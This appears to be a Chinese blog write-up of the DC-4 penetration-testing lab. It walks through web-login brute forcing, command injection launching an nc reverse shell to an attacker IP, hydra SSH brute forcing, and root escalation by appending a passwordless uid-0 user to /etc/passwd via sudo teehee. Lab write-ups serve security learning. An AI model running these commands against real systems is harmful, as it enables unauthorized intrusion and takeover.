DC--4

信息收集

确定主机IP地址

netdiscover -i eth0 -r 192.168.84.0/24

image-20221215165801541

扫描端口信息

image-20221215165844978

nmap 鉴权

nmap 192.168.84.180 -sV -A -p 80 --script=vuln

image-20221216122437915

WEB测试

访问靶机的80端口

image-20221216122919992

由网页提示用户可能是admin,针对admin用户进行暴力破解

burp抓包请求包,进行暴力破解

密码为happy

image-20221216124344011

登录成功

image-20221216124439890

该页面,通过点击不同的功能按钮,得到不同的结果,猜测可能是执行了不同的命令

image-20221216124637171

burp抓包发现,传参的是Linux命令,且与功能按钮点匹配

image-20221216124759884

修改传参点,会怎么样呢?

image-20221216124853053

执行反弹shell

目标上执行

nc+192.168.84.174+10086+-e+/bin/bash
192.168.84.174 -- 攻击机IP地址
10086 -- 攻击机的端口

image-20221216125620309

攻击机上进行端口的监听

image-20221216125637116

获取标准的shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20221216130114054

提权

读取passwd文件发现有三个普通用户,然后分别进行了查看

image-20221216130236320

查看每个用户的家目录-在jim用户的家目录发现了old-password文件

image-20221216130339541

image-20221216130525681

由于开放了22端口,则对jim用户进行ssh服务爆破

hydra -l jim -P ./jim-oldpasswd.txt 192.168.84.180 ssh
jim-oldpasswd.txt为jim家目录下的old-passwords.bak文件

image-20221216131448827

登录jim用户

image-20221216131704199

在/var/mail下有封邮件

image-20221216131934526

得知charles用户的密码为^xHhA&hvim0y,登录成功

image-20221216132430952

发现teehee 不需要root的用户密码

image-20221216132728313

teehee

teehee是个小众的linux编辑器,如果有sudo权限,可以利用其来提权

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

例如:echo "xbxaq::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制,如果没有shadow条目,且passwd用户密码条目为空的时候,可以本地直接su空密码登录。
所以只需要执行su xbxaq就可以登录到xbxaq用户,这个用户因为uid为0,所以也是root权限

passwd的格式:[⽤户名]:[密码]:[UID]:[GID]:[⾝份描述]:[主⽬录]:[登录shell]

提权命令

 echo 'xbxaq::0:0:root:/root:/bin/bash' | sudo teehee -a /etc/passwd

image-20221216161831807

image-20221216161938563

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值